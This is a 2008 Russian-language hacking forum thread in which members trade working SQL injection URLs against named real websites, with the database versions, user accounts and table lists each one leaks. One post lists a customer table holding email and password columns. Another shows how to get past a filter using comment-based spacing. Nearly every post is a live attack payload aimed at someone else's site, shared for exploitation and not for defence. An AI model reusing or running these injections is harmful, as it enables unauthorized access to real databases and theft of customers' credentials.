SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+CONCAT(0x3a,Version(),0x3a),2,3,4,5,6,7,8,9/*
    Version() - 5.0.19
    Database() - presscenter


    Code:
    http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+table_name,2,3,4,5,6,7,8,9+from+information_schema.tables+limit+17,1/*
     
    #7161 R1dex, 28 Dec 2008
    Last edited: 28 Dec 2008
  2. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    как ты определил что в начале до 9-ти нао перебирать там ведь хоть до 999 перебери надпись не меняетя!
     
  3. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    а ты уверен?ты встречался со скулями где например вместо ошибки надпись "Хакинг атемптинг" или тому подобного..
    так же и здесь..это не стандартная скуля..
    а цифра один экранируется в ошибке..
    ----
    Germani если есть разница вывода то скуля(т.е. если на 1 есть надпись,а на 999 нет,или наоборот)
     
    #7163 masternet, 28 Dec 2008
    Last edited: 28 Dec 2008
  4. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Да кстати! Я встречался с такими, на ntu.kz, в случае хоть малейшей пробы на скулю, пишет что-то вроди: "Hacker's attack attempt, admin was informed"
     
  5. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    "Компания АМТЭЛ. С первых дней основным видом деятельности компании являются сетевые проекты, поставка серверов и систем высшего класса отказоустойчивости..."

    Code:
    http://www.amtel.ru/page.php?id=-1+union+select+version()/*
    Code:
    http://presscenter.kz/index.php?show=news&id=-1+order+by+10/*
    
    Code:
    http://presscenter.kz/index.php?show=news&id=-1+order+by+9/*
     
  6. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.izba.kz/ru/pages/index.php?id=-1+union+select+1,2,3,4,5,6,version(),8,user(),10,11,12,13,14,15,16,17,18,19,20--

    4.1.22-STANDARD
    siteis_user@localhost
     
  7. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.suncar.kz/index.php?id=1+union+select+unhex(hex(concat(table_name))),database(),version(),user()+from+information_schema.tables--
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.readplus.com.au/blog_detail.php?id=239+union+select+1,version(),3,4,5,6,7,8,9/*
    4.1.22-standard

    Code:
    http://www.egd.com/pages/blog_detail.php?id=-11+union+select+1,2/*
    Code:
    http://www.publicaffairsnetworking.com/blog_detail.php?id=-29+union+select+1,version(),3,4,5,6/*
    5.0.45

    Code:
    http://hddvdmovieguide.com/blog_detail.php?id=-64+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16/*
    4.1.22-standard

    Code:
    http://www.dvdmovieguide.com/blog_detail.php?id=-10+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16/*
    4.1.22-standard

    Code:
    http://www.visitmaldives.com/ru/Where_to_stay/cruise-boat.php?id=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    4.1.22-standard

    Code:
    http://nauticaseychelles.com/boat.php?id=-37+union+select+1,version(),3,4,5,6/*
    4.1.22-standard-log

    Code:
    http://www.pelicanmarine.com.au/boat.php?ID=-1018+union+select+1,version(),3,4,5,6,7,8,9,10/*
    4.1.22-standard 3

    Code:
    http://www.gosail.com/boat.php?display=-29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--
    5.0.67-community

    Code:
    http://www.mclayboats.co.nz/boat.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
    4.0.27-standard-log
     
    _________________________
    #7168 yarbabin, 28 Dec 2008
    Last edited: 28 Dec 2008
    2 people like this.
  9. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    не очень люблю выкладывать линки.. не удержался.
    Сайт посвящен php программированию. Типа php.net :)
    http://www.phpbuddy.com/article.php?id=-1+union+select+1,2,3,4,5,6/*
    phpbud22_phpbudd@localhost_4.1.21-standard
     
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Innatack.Ru
    Только в опере почему то отображается .... хз почему..
    http://www.inattack.ru/program/662.html'


    В самом низу страницы, и в соурсе внизу -
    Пробовал раскручивать - не идет что то.. может фейк?
     
  11. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.emctc.ru/cgi-bin/db_new_logist.cgi?num=-1+union+select+1,column_name,3+from+information_schema.columns+where+table_name='item'--


    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    ALPHABET
    ALPHABET_ENG
    ANONS
    BELARUS
    BELARUS_V
    CARRIERS
    CARRIERS_ENG
    CONTENT
    CONTENT_ENG
    CRYPTO
    CUSTOMS
    CUSTOMS1
    CUST_BOD
    CUST_BOD_ENG
    CUST_BOD_MOS
    CW
    DEPARTMENTS
    DEPARTMENTS_ENG
    DOCS
    DOCS1
    DOCS2
    DOCS_EMCTC
    DOCS_ENG
    DOCS_T
    DUTYFREE
    ECONOMY
    ECONOMY_ENG
    EMCTC_CONTENT
    EMCTC_NEWS
    EMCTC_NEWS_SECTIONS
    EVROAZS
    EVROAZS_ENG
    HIT
    INFRINGERS1
    INFRINGERS2
    KAZAHSTAN
    KAZAHSTAN_V
    KLIENTI
    LINKS
    LOGISTIC
    LOGISTICRSS
    LOGISTIC_ENG
    NEWS
    NEWSRSS
    NEWS_ENG
    OTO
    POPULYR
    PRACTICE
    QUESTIONS_VCH
    REFERATS
    REVIEW
    REVIEW_ENG
    RUMORS
    RUMORS_ENG
    SEMINARS
    SHIFR
    SHIT
    SearchStrings
    TEMP
    TEXT
    TEXT_ENG
    TW
    UKRAINA
    UKRAINA_V
    VASYANYA
    VTOROSSII
    WAREHOUSES
    aaa
    banners
    banners_eng
    baz_sklad
    doska_bodies
    doska_headers
    garant_banks
    item
    item_group
    job_bodies
    job_headers
    price30
    tam


    мне кажется или все папки пустые? :confused:
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.claptonweb.com/boots/boot.php?id=-124+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17/*
    5.0.45-Debian_1ubuntu3.3-log

    Code:
    http://www.cfsontario.ca/english/general.php?id=11111111111111111+union+select+1,2,3,version(),5,6,7,8,9,10,11/*
    5.0.45-log

    Code:
    http://www.akg-russia.ru/about.php?id=-4+union+select+1,2,3,4,5/*
    Code:
    http://www.akg-russia.ru/about.php?id=-4+union+select+1,2,3,4,5/*
    Code:
    http://www.greetingcard.org/about.php?ID=-2+union+select+1,version(),3,4,5,6,7,8,9,10--
    5.0.67

    Code:
    http://www.tptherapy.com/about.php?id=-19'+union+select+1,2,3,version(),5,6,7,8,9/*
    4.1.22-standard

    Code:
    http://www.mlsoftball.com/about.php?ID=-2+union+select+1,2,version()/*
    4.0.27-standard
    Code:
    http://www.palit.biz/main/about.php?id=-1+union+select+1,2,3,4,version(),6,7/*
    4.1.21

    Code:
    http://www.demotech.org/d-about.php?id=-3+union+select+1,version(),3,4,5,6/*
    5.0.32-Debian_7etch1

    Code:
    http://www.artmaterial.ru/about.php?content=dealer&id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12/*
    4.1.22-standard-log

    Code:
    http://www.ywamyork.com/about/about.php?id=-11+union+select+1,version(),3,4,5,6,7,8,9--
    5.0.67-community-log

    Code:
    http://www.personal.in.ua/article.php?ida=-346+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
    
    4.1.22

    Code:
    http://www.brain-storming.info/article.php?ida=-70+union+select+1/*
     
    _________________________
  13. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.projector-club.ru/index.php?id=9&manuf=-1+union+select+user(),2,3,version(),5,6,7,8,9,10,11,12,database(),14,15,16,17,18,19,20--

    olimpor_project@localhost
    olimpor_projector
    4.1.22-standard-log
     
    1 person likes this.
  14. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Code:
    _http://en.apa.az/news.php?id=-89125+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--
    5.0.67-community

    Code:
    _http://www.aupe.org/in_the_news/news.php?id=-993+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
    4.0.18

    Code:
    _http://www.avezdoaluno.com.br/navegacao/prof.php?id=-53+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15--
    5.0.67-log

     
    #7174 I love this game, 29 Dec 2008
    Last edited: 29 Dec 2008
    3 people like this.
  15. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.mibf.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

    Я ослеп!!!
     
  16. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Tkastrey.ru - PR5 ~4к
    логический вывод 4 ветка..

    Arkhangel.ru - PR3 ~5к
    5 ветка, в базе нету табл форума(
     
    #7176 sabe, 29 Dec 2008
    Last edited: 29 Dec 2008
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    гы-гы, http://arkhangel.ru/phpBB2/

    понятно, что нет
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Тоже буду подарки на НГ делать:))

    Найденные таблицы:
    -------
    article
    content
    customer
    news
    orders
    partner
    session
    shops
    -------
    =============================
    Найденные колонки из таблицы customer:
    -------
    email
    password
    status
    username
    =============================
     
    #7178 Pashkela, 29 Dec 2008
    Last edited: 29 Dec 2008
  19. vladvk

    vladvk New Member

    Joined:
    22 Dec 2008
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Поясните, что за дрянь, уже порядка трех десятков с такой дрянью нашел:
    http://www.ac-alp.ru/part/index.php?id=-42+order+by+10--
    А он мне пишет:
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    vladvk Это фильтрация "+", " ", не знаю , может ещё чего не смотрел )
    http://www.ac-alp.ru/part/index.php?id=-41/**/union/**/select/**/1,2,concat_ws(0x3a,User(),Database(),Version()),4,5,6,7

    PS Вопросы в соседней теме (на будующее)
    PPS
    Я же Вас просил. не писать охинею :)
     
    #7180 Kakoytoxaker, 29 Dec 2008
    Last edited: 29 Dec 2008
Thread Status:
Not open for further replies.